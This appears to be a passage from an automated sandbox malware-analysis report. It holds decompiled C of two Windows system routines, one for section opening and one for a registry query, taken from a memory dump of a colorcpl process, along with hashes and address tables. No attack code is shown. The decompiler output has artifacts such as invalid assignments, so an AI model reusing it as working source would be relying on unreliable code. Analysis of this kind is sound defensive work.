                                                                                                0x06e86dfd
                                                                                                0x06e86e01
                                                                                                0x06e86e05
                                                                                                0x06e86e09
                                                                                                0x06e86e0d
                                                                                                0x06e86e11
                                                                                                0x06e86e11
                                                                                                0x06e451eb
                                                                                                0x06e86e1a
                                                                                                0x06e86e1f
                                                                                                0x06e86e21
                                                                                                0x06e86e23
                                                                                                0x00000000
                                                                                                0x06e451f1
                                                                                                0x06e451f1
                                                                                                0x00000000
                                                                                                0x06e451f1

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 898b3117e581b4eb70762140c5415b9f09d6e74b668bbbb73ae567773ee3fc84
                                                                                                • Instruction ID: cb43b6eaab8993592d073656a10af6ec7f821ba6daba6c2328c8214016b2c794
                                                                                                • Opcode Fuzzy Hash: 898b3117e581b4eb70762140c5415b9f09d6e74b668bbbb73ae567773ee3fc84
                                                                                                • Instruction Fuzzy Hash: 8EC113755083808FD394DF28C980A5AFBF1BF88308F14596EF9998B352D771E945CB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E403E2 Relevance: .3, Instructions: 254COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E06E403E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x6f0d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E06E40548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E06E5B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E06E2B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x6f07c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E06E37D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E06E37D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E06E97016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E06E59830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E06E969A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x6f07c04 != 0) {
						_t118 = _v12;
						_t120 = E06E9A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x6f07bd8;
						if( *0x6f07bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E06E595D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E06E599A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E06E93540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E06E1B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E06E5AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x6f08474 - 3;
										if( *0x6f08474 != 3) {
											 *0x6f079dc =  *0x6f079dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E06E37D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E06E37D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E06E97016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x6f08708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x6f07b00; // 0x0
							asm("ror esi, cl");
							 *0x6f0b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E06E595D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E06E27F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                0x06e403f1
                                                                                                0x06e403f7
                                                                                                0x06e403f9
                                                                                                0x06e403fb
                                                                                                0x06e403fd
                                                                                                0x06e40400
                                                                                                0x06e4040a
                                                                                                0x06e84c7a
                                                                                                0x06e40537
                                                                                                0x06e40547
                                                                                                0x06e40410
                                                                                                0x06e40410
                                                                                                0x06e40414
                                                                                                0x06e40417
                                                                                                0x06e4041a
                                                                                                0x06e40421
                                                                                                0x06e40424
                                                                                                0x06e4042b
                                                                                                0x06e4043b
                                                                                                0x06e4043e
                                                                                                0x06e4043f
                                                                                                0x06e4043f
                                                                                                0x06e40446
                                                                                                0x06e40449
                                                                                                0x06e4044c
                                                                                                0x06e4044f
                                                                                                0x06e40459
                                                                                                0x06e84c8d
                                                                                                0x06e4045f
                                                                                                0x06e4045f
                                                                                                0x06e4045f
                                                                                                0x06e40467
                                                                                                0x06e84c97
                                                                                                0x06e84c9d
                                                                                                0x06e84ca4
                                                                                                0x06e84caa
                                                                                                0x06e84caf
                                                                                                0x06e84cb1
                                                                                                0x06e84cc3
                                                                                                0x06e84cb3
                                                                                                0x06e84cbc
                                                                                                0x06e84cbc
                                                                                                0x06e84cc8
                                                                                                0x06e84ccb
                                                                                                0x06e84cd7
                                                                                                0x06e84cda
                                                                                                0x06e84cdf
                                                                                                0x06e84cdf
                                                                                                0x06e84ccb
                                                                                                0x06e84ca4
                                                                                                0x06e4046d
                                                                                                0x06e4046f
                                                                                                0x06e4046f
                                                                                                0x06e40471
                                                                                                0x06e40476
                                                                                                0x06e4047a
                                                                                                0x06e4047b
                                                                                                0x06e40483
                                                                                                0x06e40489
                                                                                                0x06e4048d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84ce9
                                                                                                0x06e84cef
                                                                                                0x06e84d22
                                                                                                0x06e84d22
                                                                                                0x00000000
                                                                                                0x06e84d22
                                                                                                0x06e84cf1
                                                                                                0x06e84cf7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84cf9
                                                                                                0x06e84cff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d05
                                                                                                0x06e84d07
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d0d
                                                                                                0x06e84d0f
                                                                                                0x06e84d14
                                                                                                0x06e84d16
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d1c
                                                                                                0x06e84d1c
                                                                                                0x06e40499
                                                                                                0x06e40535
                                                                                                0x06e40535
                                                                                                0x00000000
                                                                                                0x06e40535
                                                                                                0x06e404a6
                                                                                                0x06e84d2c
                                                                                                0x06e84d37
                                                                                                0x06e84d39
                                                                                                0x06e84d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d41
                                                                                                0x06e84d48
                                                                                                0x06e40527
                                                                                                0x06e4052b
                                                                                                0x06e4052d
                                                                                                0x06e40530
                                                                                                0x06e40530
                                                                                                0x00000000
                                                                                                0x06e4052b
                                                                                                0x06e84d4e
                                                                                                0x06e404ac
                                                                                                0x06e404ac
                                                                                                0x06e404af
                                                                                                0x06e404b2
                                                                                                0x06e404b7
                                                                                                0x06e404b9
                                                                                                0x06e404bb
                                                                                                0x06e404bd
                                                                                                0x06e404bf
                                                                                                0x06e404c5
                                                                                                0x06e404c9
                                                                                                0x06e84d53
                                                                                                0x06e84d59
                                                                                                0x06e84db9
                                                                                                0x06e84dba
                                                                                                0x06e84dbf
                                                                                                0x06e84dc2
                                                                                                0x06e84dc4
                                                                                                0x06e84dc7
                                                                                                0x06e84dce
                                                                                                0x00000000
                                                                                                0x06e84dce
                                                                                                0x06e84d5b
                                                                                                0x06e84d61
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d63
                                                                                                0x06e84d69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84d6b
                                                                                                0x06e84d6e
                                                                                                0x06e84d74
                                                                                                0x06e84d76
                                                                                                0x06e84d7c
                                                                                                0x06e84d7e
                                                                                                0x06e84d84
                                                                                                0x06e84d89
                                                                                                0x06e84d8c
                                                                                                0x06e84d8d
                                                                                                0x06e84d92
                                                                                                0x06e84d95
                                                                                                0x06e84d96
                                                                                                0x06e84d98
                                                                                                0x06e84d9a
                                                                                                0x06e84d9f
                                                                                                0x06e84da4
                                                                                                0x06e84da6
                                                                                                0x06e84da8
                                                                                                0x06e84daf
                                                                                                0x06e84db1
                                                                                                0x06e84db1
                                                                                                0x06e84daf
                                                                                                0x06e84da6
                                                                                                0x06e84d84
                                                                                                0x06e84d7c
                                                                                                0x00000000
                                                                                                0x06e84d74
                                                                                                0x06e404d6
                                                                                                0x06e84de1
                                                                                                0x06e404dc
                                                                                                0x06e404dc
                                                                                                0x06e404dc
                                                                                                0x06e404e4
                                                                                                0x06e84deb
                                                                                                0x06e84df1
                                                                                                0x06e84df8
                                                                                                0x06e84dfe
                                                                                                0x06e84e03
                                                                                                0x06e84e05
                                                                                                0x06e84e17
                                                                                                0x06e84e07
                                                                                                0x06e84e10
                                                                                                0x06e84e10
                                                                                                0x06e84e1c
                                                                                                0x06e84e1f
                                                                                                0x06e84e35
                                                                                                0x06e84e35
                                                                                                0x06e84e1f
                                                                                                0x06e84df8
                                                                                                0x06e404f1
                                                                                                0x06e404fa
                                                                                                0x06e84e3f
                                                                                                0x06e84e47
                                                                                                0x06e84e5b
                                                                                                0x06e84e61
                                                                                                0x06e84e67
                                                                                                0x06e84e69
                                                                                                0x06e84e71
                                                                                                0x06e84e73
                                                                                                0x06e40500
                                                                                                0x06e40500
                                                                                                0x06e40500
                                                                                                0x06e404fa
                                                                                                0x06e40508
                                                                                                0x06e4051d
                                                                                                0x06e4051d
                                                                                                0x06e4051f
                                                                                                0x06e40524
                                                                                                0x00000000
                                                                                                0x06e40524
                                                                                                0x06e40515
                                                                                                0x06e40517
                                                                                                0x06e84e7a
                                                                                                0x06e84e7c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84e85
                                                                                                0x00000000
                                                                                                0x06e84e85
                                                                                                0x00000000
                                                                                                0x06e40517

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbc2b25bfcfd7ab2bbda0f3cbf217f10216c46b2cf445550dbf9b52ea15b17e8
                                                                                                • Instruction ID: 5c11f359adf79742191307519a396129f88235f1fe53f83f0daaaa933f0daaed
                                                                                                • Opcode Fuzzy Hash: cbc2b25bfcfd7ab2bbda0f3cbf217f10216c46b2cf445550dbf9b52ea15b17e8
                                                                                                • Instruction Fuzzy Hash: EE91E631E00315DFEBB1AB78DC44BAD77E5EB01768F052261EA24AB2D1D7749D04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1C600 Relevance: .2, Instructions: 225COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E06E1C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x6f0d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E06E26D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E06E5B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x6f07b9c; // 0x0
					_t74 = L06E34620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E06E59650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L06E377F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E06E5F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E06E513C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L06E377F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E06E59650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                0x06e1c608
                                                                                                0x06e1c615
                                                                                                0x06e1c625
                                                                                                0x06e1c62d
                                                                                                0x06e1c635
                                                                                                0x06e1c640
                                                                                                0x06e1c680
                                                                                                0x06e1c687
                                                                                                0x06e1c688
                                                                                                0x06e1c689
                                                                                                0x06e1c694
                                                                                                0x06e1c694
                                                                                                0x06e1c642
                                                                                                0x06e1c64a
                                                                                                0x06e1c697
                                                                                                0x06e87a25
                                                                                                0x06e87a2b
                                                                                                0x06e87a2e
                                                                                                0x06e87a30
                                                                                                0x06e87bea
                                                                                                0x06e87bea
                                                                                                0x00000000
                                                                                                0x06e87bea
                                                                                                0x06e87a36
                                                                                                0x06e87a43
                                                                                                0x06e87a48
                                                                                                0x06e87a4c
                                                                                                0x06e87a4e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87a58
                                                                                                0x06e87a5a
                                                                                                0x06e87a5b
                                                                                                0x06e87a5c
                                                                                                0x06e87a5d
                                                                                                0x06e87a63
                                                                                                0x06e87a64
                                                                                                0x06e87a6a
                                                                                                0x06e87a6c
                                                                                                0x06e87a6e
                                                                                                0x06e879cb
                                                                                                0x06e879cb
                                                                                                0x06e879ce
                                                                                                0x06e879d0
                                                                                                0x06e87a98
                                                                                                0x06e87a9b
                                                                                                0x06e87a9b
                                                                                                0x06e87a9e
                                                                                                0x06e87aa1
                                                                                                0x06e87bbe
                                                                                                0x06e87bbe
                                                                                                0x06e87bc0
                                                                                                0x06e87be0
                                                                                                0x06e87be0
                                                                                                0x06e87a01
                                                                                                0x06e87a01
                                                                                                0x06e87a05
                                                                                                0x06e87a07
                                                                                                0x06e87a15
                                                                                                0x06e87a15
                                                                                                0x06e87a1a
                                                                                                0x00000000
                                                                                                0x06e87a1a
                                                                                                0x06e87bc2
                                                                                                0x06e87bc6
                                                                                                0x06e87bc9
                                                                                                0x06e87bcd
                                                                                                0x06e87bcf
                                                                                                0x06e879e6
                                                                                                0x06e879e6
                                                                                                0x06e879eb
                                                                                                0x06e879eb
                                                                                                0x06e879ef
                                                                                                0x06e879f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e879f3
                                                                                                0x06e879f5
                                                                                                0x06e879ff
                                                                                                0x06e879ff
                                                                                                0x00000000
                                                                                                0x06e879ff
                                                                                                0x06e879f7
                                                                                                0x06e879fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e879fd
                                                                                                0x06e87bd5
                                                                                                0x06e87bd8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87ba9
                                                                                                0x06e87bac
                                                                                                0x06e87bb0
                                                                                                0x06e87bb1
                                                                                                0x06e87bb1
                                                                                                0x06e87bb6
                                                                                                0x00000000
                                                                                                0x06e87bb6
                                                                                                0x06e87aa7
                                                                                                0x06e87aaa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87ab2
                                                                                                0x06e87ab3
                                                                                                0x06e87ab5
                                                                                                0x06e87aec
                                                                                                0x06e87aef
                                                                                                0x06e87b25
                                                                                                0x06e87b28
                                                                                                0x06e87b62
                                                                                                0x06e87b64
                                                                                                0x06e87b8f
                                                                                                0x06e87b92
                                                                                                0x06e87b96
                                                                                                0x06e87b98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87b9e
                                                                                                0x06e87b9f
                                                                                                0x06e87ba3
                                                                                                0x00000000
                                                                                                0x06e87ba3
                                                                                                0x06e87b66
                                                                                                0x06e87b68
                                                                                                0x06e87ae2
                                                                                                0x06e87ae2
                                                                                                0x00000000
                                                                                                0x06e87ae2
                                                                                                0x06e87b6e
                                                                                                0x06e87b72
                                                                                                0x06e87b75
                                                                                                0x06e87b81
                                                                                                0x06e87b85
                                                                                                0x06e87b87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87b31
                                                                                                0x06e87b34
                                                                                                0x06e87b3c
                                                                                                0x06e87b45
                                                                                                0x06e87b46
                                                                                                0x06e87b4f
                                                                                                0x06e87b51
                                                                                                0x06e87b57
                                                                                                0x06e87b59
                                                                                                0x06e87b59
                                                                                                0x00000000
                                                                                                0x06e87b59
                                                                                                0x06e87b77
                                                                                                0x00000000
                                                                                                0x06e87b77
                                                                                                0x06e87b2a
                                                                                                0x00000000
                                                                                                0x06e87b2a
                                                                                                0x06e87af1
                                                                                                0x06e87af3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87afb
                                                                                                0x06e87afc
                                                                                                0x06e87afe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87b00
                                                                                                0x06e87b03
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87b05
                                                                                                0x06e87b09
                                                                                                0x06e87b0d
                                                                                                0x06e87b0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87b18
                                                                                                0x06e87b1d
                                                                                                0x00000000
                                                                                                0x06e87b1d
                                                                                                0x06e87ab7
                                                                                                0x06e87ab9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87abf
                                                                                                0x06e87ac1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87ac3
                                                                                                0x06e87ac6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87ac8
                                                                                                0x06e87acc
                                                                                                0x06e87ad0
                                                                                                0x06e87ad2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87adb
                                                                                                0x00000000
                                                                                                0x06e87adb
                                                                                                0x06e879d6
                                                                                                0x06e879d9
                                                                                                0x06e879dc
                                                                                                0x06e87a91
                                                                                                0x06e87a94
                                                                                                0x00000000
                                                                                                0x06e87a94
                                                                                                0x06e879e2
                                                                                                0x00000000
                                                                                                0x06e879e2
                                                                                                0x06e87a74
                                                                                                0x06e87a7a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87a8a
                                                                                                0x06e87a21
                                                                                                0x06e87a21
                                                                                                0x00000000
                                                                                                0x06e87a21
                                                                                                0x06e1c650
                                                                                                0x06e1c651
                                                                                                0x06e1c656
                                                                                                0x06e1c65c
                                                                                                0x06e1c65d
                                                                                                0x06e1c663
                                                                                                0x06e1c664
                                                                                                0x06e1c66a
                                                                                                0x06e1c66e
                                                                                                0x06e879c5
                                                                                                0x06e879c7
                                                                                                0x00000000
                                                                                                0x06e879c7
                                                                                                0x06e1c67a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f90fbf3126d58fa18f5951964ee87e57b0eae9724ad58b43bb857f9cc63b58c4
                                                                                                • Instruction ID: ecdc3aa1b3840df248cee666f3c34e64b9f206937bd5243677e428b747e8b857
                                                                                                • Opcode Fuzzy Hash: f90fbf3126d58fa18f5951964ee87e57b0eae9724ad58b43bb857f9cc63b58c4
